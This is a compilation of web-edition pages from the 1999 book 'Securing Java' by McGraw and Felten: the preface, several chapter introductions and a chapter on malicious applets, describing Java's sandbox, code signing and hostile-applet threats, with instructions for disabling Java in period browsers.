Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Beyond the Sandbox Signed Code and Java 2
Next Page
Java has outgrown the original restrictive sandbox. The anticipated future of mobile code security, a complex mix of sandboxing and code signing, is now upon us with Java 2. In essence, the three parts of the sandbox explained in the previous chapter implement a language-based security enforcer. This enforcement model has been hybridized and expanded to include fine-grained notions of trust and permission built on digital signatures. That means major changes to Java security. This chapter centers on those changes. Chapter 1, "Mobile Code and Security: Why Java Security Is Important," briefly introduced the notion of code signing and mobile code policy through the discussion of ActiveX. The ActiveX trust model is suited only to run completely trusted code. At the core of that kind of trust model is a black-and-white decision either to trust the code or not. Such a decision can be influenced by determining who vouches for the code. Digital signatures are used for the vouching. Java's approach to trust is also based on digital signatures. However, instead of allowing only black-andwhite trust decisions à la ActiveX, Java 2 allows fine-grained access control decisions to be made. With the introduction of code signing in JDK 1.1, Java's sandbox model underwent a state transition from a required model applied equally to all Java applets to a malleable system that could be expanded and personalized on an applet-by-applet basis. Java 2 further complicates the picture with the addition of access control. When combined with access control, code signing allows applets to step outside the security sandbox gradually. In fact, the entire meaning of sandbox becomes a bit vague. As an example of how Java code signing might work, an applet designed for use in an Intranet setting could be allowed to read and write to a particular company database as long as it was signed by the system administrator. Such a relaxation of the security model is important for developers who have complained about Java's restrictive sandbox. Writing code that works within the tight restrictions of the sandbox is a pain, and the original sandbox is very restrictive. The addition of code signing to Java complicates things. As it now stands, the Java sandbox has been
reduced to a default. The whole game has changed. Tracing the history of this change as we do in this chapter can lend some important perspective. Before we dig into the complex issues of code signing and trust models, it does us good to review what it is we're trying to achieve in the first place. After all, the point of all this highfalutin' architecture is not to make the world's most complicated system. The real objective is securing mobile code. After we remind ourselves of the main goal of the new security model, we are ready to trace its evolution. We will begin by explaining the enhancements added to Java with the release of JDK 1.1, and go on to discuss the Java 2 model in detail.
Chapter Three Sections 1. 2. 3. 4. 5. 6. 7. 8.
What's the Main Goal? Security Enhancements in JDK 1.1 Signed Code Trust An Introduction to Java 2 Security Access Control and Stack Inspection New Security Mechanisms in Sun's Java 2 Outside the Sandbox
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help
Next Page
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Attack Applets: Exploiting Holes in the Security Model
Next Page
There is a tightrope to walk in this chapter. You should understand the problems encountered with Java, so you know how things can go wrong, especially if you are charged with designing security-critical systems, administering a large number of Java users, or making business decisions that depend on Java security issues. But it is not the intent of this book to give the bad guys a manual for invading your computer. Although we discuss Java security problems, we hope you forgive the omission of details necessary to exploit these problems. Just for the record, we do not believe in security by obscurity. If we did, we would not have written this book at all. However, we don't believe in publishing exploit scripts and aiding and abetting attacks by inexperienced would-be crackers, either. Serious Java attacks have yet to escape the lab, and we want to do our part to keep it that way. In the early days of Java, Sun Microsystems and the rest of the Java industry hyped Java as completely secure [Sun Microsystems, 1995]. This was really no surprise. They still have a lot to gain if you believe them and jump aboard the Java bandwagon without even considering the risks of doing so. It's true that Sun Microsystems, Netscape, Microsoft, and others have gone to great lengths to make their Java implementations as secure as possible. That's all well and good, but you don't want effort-you want results. To this day, the question remains: Is Java safe enough to use? This chapter examines all of the serious security flaws that have been found in Java so far. By serious, we mean attacks based on these flaws could go beyond the annoyance or denial-of-service attacks of Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." These attacks could corrupt data on your hard disk, reveal your private data to third parties, turn your machine into a hostile listening post, or infect your machine with a virus. By exploiting some of the vulnerabilities discussed here, a cracker could attain the ultimate cracker goal-complete control of your machine. Java vendors are very quick to fix any problems that are discovered in Java. In fact, vendor response to the discovery of a new Java security hole far surpasses the usual response to non-Java-related security
problems posted to Bugtraq and other mailing lists run by security professionals (Bugtraq archives are available at www.geek-girl.com/bugtraq/). In terms of Java, the penetrate-and-patch machine is smoothly oiled (not that it represents the best approach to security, but that's another issue). Rest assured that the problems we discuss in this chapter have been fixed in the latest JVMs, including those packaged in Javaenabled browsers. That means if you're using an up-to-date version of your favorite browser, these specific problems won't affect you. On the flip side, if you're using an older browser like Netscape 2.x/3.x or Internet Explorer 3.x, this chapter provides enough information about serious attacks that you really should upgrade immediately. Browsers are not patched; they are made obsolete through accelerated release of new versions. Using an old browser to surf the Web is like wearing a "kick me" sign to a fraternity party. Though these specific attacks are not likely to be your problem since they have been fixed, they indicate what sorts of things can go wrong and what the consequences are when things do go wrong. If more Java security problems are found in the future, they're likely to be similar to the ones presented here. Hopefully the industry can learn from its old mistakes and avoid reintroducing old holes (as often happens in computer security). Most of these problems were trivial to fix once they were discovered. Removing security bugs is like removing needles from a haystack: It's hard to find the needles, but they're easy to remove once you know where they are. To push the analogy a bit: It's obviously much better to find the needles before they stick you. This principle motivates our Java security research.
Chapter Five Sections 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16.
Implementation Errors or Specification Errors? Attack Applets What Applets Aren't Supposed to Do A Chronology of Problems Jumping the Firewall Slash and Burn You're Not My Type Applets Running Wild Casting Caution to the Wind Tag-Team Applets Big Attacks Come in Small Packages Steal This IP Number Cache Cramming Virtual Voodoo The Magic Coat Verifying the Verifier
17. 18. 19. 20.
The Vacuum Bug Look Over There Beat the System What These Problems Teach Us
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Malicious Applets: Avoiding a Common Nuisance
Next Page
Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," explain how Java 2's security system works. This chapter and the next explain how it doesn't. Unfortunately, it is entirely possible to (mis)use Java, especially in its applet form, as a vehicle for attacking systems. Language-based security controls like those found in Java make writing a hostile applet more difficult than it might be otherwise, but they don't make it impossible. (Recall that Java security stacks up favorably against competing mobile code systems like ActiveX, as we discussed in Chapter 1, "Mobile Code and Security: Why Java Security Is Important.") Applets that misbehave and do something that their users don't want to happen are called hostile applets. There are two varieties of hostile applets: malicious applets and attack applets. The names of the two classes make it clear which is the more serious variety. Fortunately, attack applets are not commonly encountered on the Web; in fact, no attack applets have been seen to date in the wild (that is, outside the labs in which they were created). That's not to say that attack applets are not real. They are. Attack applets are real applets, written in everyday Java, that work against popular browsers such as the one you use. Attack applets have been created and extensively tested in the laboratory. (We return to the subject of attack applets in Chapter 5, "Attack Applets: Exploiting Holes in the Security Model.") There is, however, another more pervasive kind of hostile applet, not as serious a security concern, but still worthy of attention-the malicious applet. Unlike their attack applet cousins, malicious applets have escaped the lab. Such realities make it necessary for all users of Java-enabled browsers (and their trusty system administrators) to be aware of Java security threats. Simply surfing over to a Web page containing a hostile applet allows it to invade your machine with its malicious code. This chapter explores many malicious applets, ranging from the merely annoying to the more seriously disturbing. Near the beginning of Chapter 2, classes of potential Java threats were discussed. The four classes of attacks named were system modification attacks, invasion of privacy attacks, denial of service attacks, and antagonistic attacks. Java is a powerful enough language that, without security constraints placed on applets, it is possible to implement all four such classes of attacks. The Java security model was designed
to thwart those threats perceived to be the greatest dangers. Much ado has been made over Java security problems, and there have in fact been a number of serious flaws. We detail the truly serious problems in Chapter 5. Such problems result in intrusions that allow arbitrary system modification (effectively, unlimited access). An attack applet based on one of these strategies constitutes a cracker breaking into your machine. It is true that the very serious attacks of the next chapter require an in-depth understanding of both Java and the Internet. It has been argued that we should feel fairly confident that few people will be able to exploit such esoteric vulnerabilities. That position is a dangerous one to take. One instance of a cracker discovering a novel attack applet will change such statements considerably. Once loose, attack applet information would quickly spread throughout the cracker community. Our job as security researchers is to find security holes and plug them before they are used by dishonest people. Security researchers also work to create such a secure model that holes are very rare. Fortunately, none of the serious attacks have shown up in the form of attack applets, although the possibility looms ominously. Don't breathe a sigh of relief yet. Tampering with Java security does not always require wizardry. In fact, writing Java code to breach security can be easy. This chapter discusses some simple Java applets gone bad. Such applets are known on the Net as malicious applets. Entire collections are available for anyone interested to see, to adapt, and to use. See, for example: ● ● ●
The Hostile Applets Home Page at www.rstcorp.com/hostile-applets DigiCrime at www.digicrime.com The Java Security Hotlist: Hostile Applets and Other Toys at www.rstcorp.com/javasecurity/applets.html
The best first defense against these sorts of applets is to learn about them.
Chapter Four Sections 1. 2. 3. 4. 5. 6. 7. 8. 9.
What Is a Malicious Applet? Annoying Applets Denial of Service Opening Untrusted Windows Stealing Cycles Forging Mail Killing Off the Competition Malicious Applets on the Web The Implications
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
Mobile Code and Security: Why Java Security Is Important
Next Page
Java security is more important than ever. Since its introduction in 1995, Java has become one of the most popular development platforms on the planet. In fact, Java has been widely adopted more quickly than any other computer language. It now easily tops the list of preferred platforms for Internet-savvy mobile code. There are tens of thousands of Java developers (some say hundreds of thousands), and demand for Java skills appears to be growing. Java is definitely here to stay. Java holds great promise as a platform for component-based software, embedded systems, and smart cards. This means Java is poised to play an important enabling role in e-commerce as these systems move from ether-ware to reality. Java components (aka JavaBeans) are appearing at a rapid pace and encapsulate critical functionality for transaction-based systems. Java smart cards for e-commerce will debut soon. But what of the hue and cry over security? Should people be so concerned about the security implications of Java that they disable Java in their browsers? Should developers avoid using Java in their systems in favor of other languages like C++? Should system administrators block Java content at the firewall (or better yet, can they)? Should business people avoid Java because of security problems? These are the some of the questions this book answers. The answers are nontrivial, and the issues are as complex as they are important.
Chapter One Sections
1. 2. 3. 4. 5. 6. 7. 8. 9. 10.
Who Cares? Mobile Code The Power of Networking Downloading Code: Not a New Problem Java in a Demitasse Securing Java How Does Java Security Stack Up? Where to Find More Information on Java Mobile Code Has Its Price Assessing the Risks
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Preface Previous Page
Next Page
Java has grown by leaps and bounds since its introduction in 1996, and is now among the most popular computing platforms on the planet. Java has evolved and changed so much that at a mere two-years old, our original work, Java Security: Hostile Applets, Holes, and Antidotes, found itself in serious need of revision and expansion. This book is the result of several years of thinking about mobile code and security, and includes many things we have discovered while working on real-world systems with businesses and government agencies. Our goal is to present enough information to help you separate fact from fiction when it comes to mobile code security. Java has become much more complicated and multifaceted than it was when it was introduced. No longer simply a client-side language for applets, Java can now be found on everything from enterprise application servers to embedded devices like smart cards. We have tried to address security factors from throughout the entire Java range in this book. We hope this book appeals to geeks and grandmothers alike (not that some grandmothers aren't geeks). Although it gets technical in places, we hope the messages are clear enough that even the casual Web user comes away with a broader understanding of the security issues surrounding mobile code. We kept four groups in mind as we wrote this book: Web users, developers, system administrators, and business decision-makers. Many of the issues of mobile code security cut across these groups. As Java integrates itself into the foundations of electronic commerce, Java security issues take on more urgency. Java is only one kind of mobile code among many. Other systems immersed in the same security dilemma include ActiveX, JavaScript, and Word Macros. It is essential not to get the wrong message from this book. Our focus on Java is no accident. We believe Java is the most viable mobile code system created to date. Don't believe that through our work we imply that other systems are any more secure than Java. Just the opposite is true. With the introduction of code signing to Java (in JDK 1.1) and its enhancement with access control (in Java 2), securing Java became much harder. Java's position along the security/functionality tradeoff has moved significantly toward functionality, to the detriment of security. This is good if you want more
functionality, which most businesses and developers seem to need, but it is bad if you are charged with managing security risks. Forming an intelligent Java use policy is more important than ever, but doing so is more complicated than it used to be. The computer field moves so fast that people have begun to refer to Internet time to grapple with its constantly accelerating speed. Three months is a year in Internet time. Java is directly involved in the speed of the field, and has done its share to make things move even more quickly. One tricky aspect of writing a topical book relating to the Web is figuring out when to stop the action. This process can be likened to freeze-framing a picture of a movie. In that sense, this book is a snapshot of Java security. We hope we have succeeded in making it a useful way to learn about Java security. For up-to-date information, see the book's companion Web site at www.rstcorp.com/java-security.html. As we went to press, Sun Microsystems renamed JDK 1.2 and called it Java 2. We have attempted to use correct version numbers throughout and apologize for any confusion. Chapter 1, "Mobile Code and Security: Why Java Security Is Important,"," sets the stage with a discussion of the four intended audiences. As Java matures, it is making important inroads into the enterprise world. That means Java security is now as important to business people and system administrators as it is to Web users and Java developers. For the uninitiated, Chapter 1 provides a quick and cursory introduction to Java. Pointers are provided to more through Java texts that cover the ins and outs of the entire Java language in more detail. This is, after all, not a book on Java per se, but is instead a book on Java security. We also spend some time discussing why the once-important distinction between applets and applications has been superceded by concerns about trust. It turns out that under the Java 2 architecture, applets can be completely trusted and applications can be completely untrusted. In fact, every kind of Java code can be doled out different amounts of trust, depending on what the user's policy says. Finally, we cover some other popular forms of mobile code and discuss how their security stacks up against Java. The main purpose of this chapter is to provide some context for the later discussion of Java's critical security implications and to introduce the central idea of the book: weighing the benefits of Java use against the risks. Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," examines the base Java security model in some detail. As a prelude to our discussion, we introduce four categories of attacks, ranging from the very serious to the merely annoying: system modification, invasion of privacy, denial of service, and antagonism. We then discuss Java's programming-languages approach to security and introduce the three parts of the original applet sandbox. These include the Verifier, the Class Loader Architecture, and the Security Manager. We also introduce the idea that Java security fundamentally relies on ensuring type safety. The base sandbox provides the foundation of Java's new trust-based security model. Starting with a restrictive sandbox for untrusted code, restrictions can be lifted little by little until code takes on complete trust and is awarded full run of the entire system. Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," examines Java's new trust-based security model. With the addition of code signing in JDK 1.1, Java's security architecture underwent a large shift. Java 2 completed the transformation with the addition of access control. It is now possible to create
complex security policy for mobile code written in Java and have the Java system itself enforce the policy. The change certainly affords more power to mobile code than ever before, but it also introduces a major new risk to Java: a human-centered policy management risk. Setting up and managing a mobile code policy will be a complex and error-prone undertaking requiring security experience. JDK 1.1 and Java 2 rest on the notion of trust, which leverages the technological power of code signing. Understanding the new model requires understanding the way code signing and trust interact, and discounting some of the common myths associated with it. Chapter 3 ends with a discussion of stack inspection and the Java 2 codesigning API. (Appendix C, "How to Sign Java Code," is a code-signing tutorial covering Microsoft, Netscape, and Sun's three different code signing schemes.) Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," begins to discuss what happens when the Java security model is abused by hostile applets. Hostile applets come in two forms: very dangerous attack applets that involve security breaches, and merely annoying malicious applets that are more of a nuisance than anything else. Chapter 4 is all about malicious applets. Malicious applets are quite easy to create, and they are equally easy to find on the Web. Unfortunately, there are just as many unscrupulous individuals on the Net as there are in the rest of the world. Bad guys are more than happy to include Java in their list of offensive weapons. Our mission is to make Java users aware of common classes of attacks. Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," delves more deeply into the Java security model by focusing attention on some of the well-publicized security holes that have been discovered. This is where our discussion of hostile applets turns more serious. Securing Java is a difficult job, especially when it comes to implementing complicated models. Attack applets have been created in the lab that exploit the holes we discuss. Some of the holes are simple implementation bugs, while others indicate more serious design flaws. The good news is that Sun and other licensees take Java security very seriously and they respond quickly to fix any holes once they are discovered. We think discussing these holes is important since it emphasizes the true nature of computer security. Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil," has two overall goals, both of which are meant to impact the Java security situation positively. The first is to suggest some high-level antidotes for Java security concerns that are not tied to particular attacks. Experts in computer security have pointed out several global deficiencies in the Java approach to security. Fixing some of these would certainly improve the model. High-level concerns addressed in Chapter 6 include programming language issues, formal analysis of Java, applet logging, trust, decompilation, applet monitoring, and policy management. Hopefully, some of the high-level concerns we raise will eventually be addressed in the Java platform itself. In the meantime, a number of third-party vendors are eager to help. The second goal of Chapter 6 is to introduce the players briefly and to discuss what risks third-party vendors can and cannot address. The computer security field has its share of snake oil, and complex issues such as mobile code security tend to be easy to exploit. One of our goals is to bring some realism to the table and arm you with the right questions to ask. If you only read one chapter of this book, read Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely." This chapter presents two sets of guidelines: one for Java developers and one for Java users. Writing security-critical code is not easy, and developers need all the help they can get. We
offer 12 rules for writing safer Java. Although the rules get a bit technical, it is worth spending some time to figure them out. By contrast, our guidelines for Java users are simple to understand and follow; in fact, most of them are simply common sense. Chapter 8, "Java Card Security: How Smart Cards and Java Mix," is devoted to Java on smart cards. We decided to include this chapter since Java Cards are likely to show up in millions of consumer wallets in the next few years. Smart card security is really too big an issue to cover in a single chapter, so we focus primarily on the security impact of putting a Java Virtual Machine on a card. Chapter 8 covers six key questions, including: What is a smart card?, Why put Java on a smart card?, and How does the use of Java impact smart card security? We conclude by covering some of the challenges to mobile code that remain to be conquered. Chapter 9, "The Future of Java Security: Challenges Facing Mobile Code," presents a concise set of six central lessons we have learned during our time in the Java security trenches. We go on to discuss several open research issues that you're likely to hear about again. Finally, we discuss the notion of security assurance, an important strategy in securing Java. We hope that this book is both informative and useful. Making intelligent decisions regarding the use of Java (especially in business and other mission-critical systems) requires some knowledge of the current risks. Our goal is to disclose those risks-and countermeasures to curtail them-as clearly and objectively as possible. Armed with the knowledge that we present in this book, Java users, site managers, and business decision-makers can make better Java use policies.
Acknowledgments This book is a collaborative effort in more ways than one. Not only did the authors work together closely, but we also sought input from many other people. We are grateful for the help we received. Reliable Software Technologies (www.rstcorp.com) remains a great place to work. The intellectually stimulating environment makes going to work interesting and fun. Many people at RST read drafts of the book or helped in other ways. They include John Viega (intrepid proofreader and co-author of the codesigning tutorial in Appendix C), Tom O'Connor (who also read the entire manuscript more than once and co-wrote the code-signing tutorial), Anup Ghosh (fellow security researcher), Peggy Wallace (travel, anyone?), Lora Kassab (one-time RST intern whose code from the first edition lives on), Jeff Payne (RST's forward-thinking CEO), Jon Beskin, Matt Schmidt, Brad Arkin, Andi Bruno (who herds the marketing cats and makes us be nice), and Jeff Voas (who continues to lead RST's excellent research group by example). The members of Princeton University's Secure Internet Programming Team (www.cs.princeton.edu/sip) also provided valuable input. Besides wading through several drafts, the Princeton team was responsible
for raising many of the key issues in Java security. Special thanks to Drew Dean and Dan Wallach (cofounders of the Princeton team) and Dirk Balfanz. Dan is now a professor at Rice University. Drew is a research scientist at Xerox PARC. Princeton's Computer Science department provides a wonderful environment for discovering and exploring new research topics. We would also like to thank Tom Cargill, independent consultant and discoverer of two security flaws; David Hopwood, discoverer of several attack applets; Mark LaDue, creator of the Hostile Applets Home Page (keep 'em honest, Mark); Dennis Volpano of the Naval Postgraduate School; Tom Longstaff, research director at the CERT Coordination Center; Roland Schemers, JavaSoft security implementation wizard (who helped with code-signing tool questions); Marianne Mueller, Java developer, security expert, and long-suffering target of press inquiries at JavaSoft; Jim Roskind, Netscape's Java security expert; Andrew Herbert, APM's Chief Scientist in the real Cambridge; Ken Ayer, chip card security manager at Visa; Don Byrd, UMass research associate and careful proofreader of the first edition; Hideyuki Hayashi, who translated the first edition into Japanese (and did an excellent job according to friends at Sumitomo in New York); Kieran Murphy, editor at developer.com; Chuck Howell, now at Mitretek; and Mike Shoffner, Java developer at Prominence Dot Com. Li Gong, security architect at JavaSoft, has been a particularly valuable help, both as a research colleague and as a sane point-of-view at JavaSoft. More power to you, Li. Wiley's staff did an excellent job shepherding this book through the editing and production process. Special thanks to Marjorie Spencer and Frank Grazioli, who went out of their way to make this project go smoothly. Thanks to Margaret Hendrey for playing fast and loose with extensions (don't tell anybody). Also thanks to the rest of the team at Wiley. Finally, and most importantly, we're grateful to our families for putting up with us while we worked on the book, again. Amy Barley, Jack, and Eli seem to have adjusted to Gary's persistent book-writing. Laura Felten and Claire suspect that Ed's book-writing has become an addiction. Without the support of our families, this book would not have been possible.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help
Next Page
Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
1
Some firewalls are now beginning to screen for Java class files, but it is unlikely that they will always be successful. For more on applet-blocking firewalls, see Chapter 6.
Close this Window
2
Actually, Java is capable of using either slashes or backslashes depending on the host's file system.
Close this Window
3
One particular class, java.lang.Object, has no superclass.
Close this Window
4
The machines the Princeton team attacks are always machines in their lab.
Close this Window
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 9 -- The Implications
Unlike the technically adept attacks to be revealed in Chapter 5, these malicious applets are very easy to write. There are malicious applets that play background sounds endlessly. There are malicious applets that consume system resources, implementing denial-of-service attacks. There are applets that forge electronic mail. There are even applets that kill other applets' threads. Now that techniques are widely available on the Hostile Applets Home Page (among other places), it is only a matter of time before malicious applets spread. Because malicious applet source code has been put on the Web, hundreds of people can start to use and adapt the ideas. We have been lucky that this has not happened yet. Perhaps we will continue to be lucky, or perhaps not. As we have seen, an applet need not break into your machine in order to do malicious things. Sometimes it is good enough to steal CPU cycles, or deny access to other sites. Malicious applets come in all shapes and sizes. Defending against all of the possibilities is at best a daunting task. Malicious applets may even play a role in undermining business on the Net. Recall the Business Assassin applet that targets Gamelan. Other anti-business applets might send forged mail with thousands of seemingly legitimate orders (resulting in thousands of expensive returns). Another malicious applet could spam the Net with ads supposedly from you, should you be from the site of a competitor. This could effectively cut your business off the Net when people respond with mail bombs. It does not take too much foresight to fear the implications that these applets have for Net commerce. At least for the moment, malicious applets are not widespread; however, it is only a matter of time before they are. Now is the time to look into ways to defend ourselves against them. Sun Microsystems agrees: "We recognize the importance of providing people with some mechanism to help them deal with hostile applets." Java 2 introduces mechanisms that can be used to help address the problem.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Beyond the Sandbox: Signed Code and Java 2 CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 8 -- Outside the Sandbox
Java 2 clearly introduces significant changes to the Java security landscape. It is likely that the days of black-and-white security policy for mobile code are numbered. With the major changes to Java's security architecture come a number of important responsibilities, the most important of which is mobile code policy creation and management. The tools are still primitive, but the policy itself is essential. Also essential to any mobile code system that makes use of code signing is solid key management capability. Although the subject of public key infrastructure (PKI) is really beyond the scope of this book, we at least invoke some important concepts. Managers responsible for setting and maintaining policies based on signed code will encounter issues including choice of certificate authority, who to issue keys to, how to ensure that private keys are kept private, whether to get a corporate key and how to protect it, how to disable keys of employees who leave an organization, where to store keys, and so on. These are nontrivial issues that have yet to be worked out in the real world. Hopefully, widespread support for code-signing systems will quickly appear on consumer desktops worldwide. Truthfully, the PKI is much less mature than many security researchers and pundits predicted it would be by now. This is partly because deploying an effective PKI is much more difficult than it sounds. But it is also at least partially due to the greed of certificate authorities who chose to charge developers for identities (public/private key pairs) instead of issuing them for free and charging elsewhere for their use. Without a solid PKI, systems like Java 2 Java may take a while to catch on. We predict that signed mobile code will find its most pervasive use among early adopters as an intranet technology (as opposed to an Internet technology). Of course, we're very well prepared to be wrong about that. For a long time, Java developers have wanted some way in which less restriction could be placed on their applets. At the same time, managers in many enterprises have been searching for ways to manage code (not just mobile code, but any code) more securely. In its Java 2 guise, Java offers a powerful answer to these needs.
We would be irresponsible not to note that with code signing comes a host of new risks to manage. Most notable among the risks are two: first, that the implementation will have holes (JDK 1.1 code signing has already fallen prey to this risk); and second, that security policies will get too complicated to understand and manage.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Malicious Applets: Avoiding a Common Nuisance CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 Previous Page
Next Page
Section 1 -- What Is a Malicious Applet?
A malicious applet is any applet that attacks the local system of a Web surfer using one of the three lessserious classes of attacks discussed in Chapter 2. Malicious applets involve denial of service, invasion of privacy, and/or annoyance. Malicious applets are written by researchers, crackers, and Net miscreants to harass, annoy, and damage Java users. They can even seriously damage a Java user's machine. Any applet that performs an action against the will of the user who invoked it should be considered malicious. It is important to emphasize again that use of the term Java user applies equally to Java developers and people surfing the Web with a Java-enabled browser. Using Java does not require any programming, or even possession of the JDK; it is enough to use a Java-enabled browser. Under this definition, most people who surf the Web with Java on are Java users. Malicious applets exist on the Web today that do the following bad things: ●
● ●
Forge mail from you to whomever the evil applet's author chooses, saying whatever they wish while masquerading as you Steal your CPU cycles to perform their own work while your legitimate processes languish Crash your local system by using all available system resources
These activities are both impressive and daunting, and we have only scratched the surface. There are also malicious applets created simply to annoy. These applets go only a bit too far, lingering at the edge of respectability. These sorts of applets do things like play sound files continuously, set up threads that monitor your Web use, and display unwanted graphics on your screen.
Stopping Malicious Applets before They Start
What can be done to stop malicious applets from doing their evil deeds? The best alternative now is to set a security policy that allows only applets signed by trusted parties to run. But if you want to surf with a Java-enabled browser and run every Java applet you come across on the Web, the safest thing to do is to avoid unknown and untrusted Web sites unless you first disable Java. Just by using a Java-enabled browser to surf the Web, you are open to attack by both attack applets and malicious applets. This danger, combined with the serious attacks discussed in Chapter 5, has caused the CERT Coordination Center to recommend disabling Java when surfing untrusted sites [CERT, 1996a; CERT, 1996b]. What can be done to stop these applets from doing their evil deeds in the future? There are many possibilities. One interesting approach would be to write detectors for bad applets based on known vulnerabilities. That way, they could be screened out by the byte code Verifier (or some similar extension). Princeton's Secure Internet Programming team has investigated this possibility extensively, and research at Reliable Software Technologies continues. (It turns out that the problem is harder than it may seem on first consideration.) A number of commercial enterprises now sell products that claim to screen byte code for malicious characteristics. We investigate these products in Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil." Another way to protect against malicious applets is by improving Java's security model. To the extent that any holes identified by researchers have been quickly and thoroughly patched, the security model can be said to be improving. However, the practice of patching software after exploits have been demonstrated is backwards. This unfortunately common strategy is known as penetrate and patch, and has been criticized for many years by security practitioners. (For more on this issue, see [McGraw, 1998].) Better software engineering and more thorough software assurance practices are much more appealing. It is even possible to write your own code defensively so it makes a much harder target for bad guys to attack (see both the guidelines of Chapter 7, "Java Security Guidelines: Developing and Using Java More Securely," and Chapter 9, "The Future of Java Security: Challenges Facing Mobile Code"). The addition of code signing to Java in JDK 1.1 and its extension with access control in Java 2 allow for the creation of complex security policies based on authentication of applet signers. Using this technology, a Web surfer could specify a list of trusted sites whose applets should be allowed to run without restrictions. The trick is creating a sound security policy and correctly coding it into your browser. The next few sections discuss various kinds of malicious applets. Starting with the least worrisome category-the merely annoying-the text progresses through the truly malicious machine-hangers. Possible motives for creating these applets are discussed along the way. Keep in mind while you read this chapter that the malicious applets described here pale in comparison with the attack applets described in Chapter 5. Fortunately, the security researchers who discovered those vulnerabilities are the good guys.
Disabling Java
Certainly, many unsavory characters are on the Net, and many of them have created similarly unsavory Web pages. If for some reason you wish to check such sites out, it would be a good idea to disable Java first. The best way to protect yourself from malicious applets is to create a policy that allows only code you trust to run. It is quicker and easier, however, to disable Java when surfing dangerous Web sites. Much like being street-wise in a big city, your choice to use or disable Java depends on what browsing you will be doing. If you keep to the sites of big business, you are less likely to find dangerous applets, just as the finance districts of New York and Chicago are less dangerous than the housing projects. Know where you are on the Web and take precautions accordingly.
Disabling Java in Netscape Navigator 4.x Disabling Java under Netscape Navigator 4.x is easy and can be done in the midst of a session. Reenabling Java is also possible, should you change your mind. Figures 4.1 and 4.2 explain how Java can be disabled in Netscape Navigator 4.x.
Figure 4.1 Disabling Java in Netscape Navigator under Solaris. From the Edit menu, select Preferences. Click on the word Advanced, which will appear in the window entitled "Category" (as shown here). To the right of that window, a series of radio buttons will appear, one of them labeled Enable Java. Click the button so it appears to be sticking out. Finally, click OK, and Java will be disabled.
Figure 4.2 Disabling Java in Netscape Navigator under Windows NT. From the Edit menu, select Preferences. Click on the word Advanced, which will appear in the window entitled "Category" (as shown here). To the right of that window, a series of checkboxes will appear, one of them labeled Enable Java. Click on the check box, removing the check mark. Finally, click OK, and Java will be disabled.
Disabling Java in Internet Explorer 4.x Internet Explorer also allows Java to be disabled. Figure 4.3 explains how Java can be disabled in Internet Explorer 4.x.
Figure 4.3 Disabling Java in Microsoft Internet Explorer. Unfortunately, under MSIE you can only disable Java on a per-zone basis. From the View menu, select Internet Options. Click on the Security tab. Select the zone for which you want to disable Java (for example, the Internet zone). (For more on zones, see Chapter 1.) Then select the Custom radio button and click on the Settings button. A dialog will come up called Security Settings. This is the dialog shown here. Scroll down until you see the Java category. It will have an expanded sub-category called Java permissions. The sub-category will have a list of options. Click on the circle labeled Disable Java, then click OK. You'll then be back at the Security tab. Click OK again, and Java will be disabled.
Snagging Malicious Code Running malicious code, especially code that explicitly claims to be malicious, is always an interesting conundrum. You may want to check a malicious applet out to see how it works against your machine, but at the same time, you don't want your machine to be compromised by an attack. Although it is advisable to avoid running malicious code at all, some people can't resist. The following strategy may help.
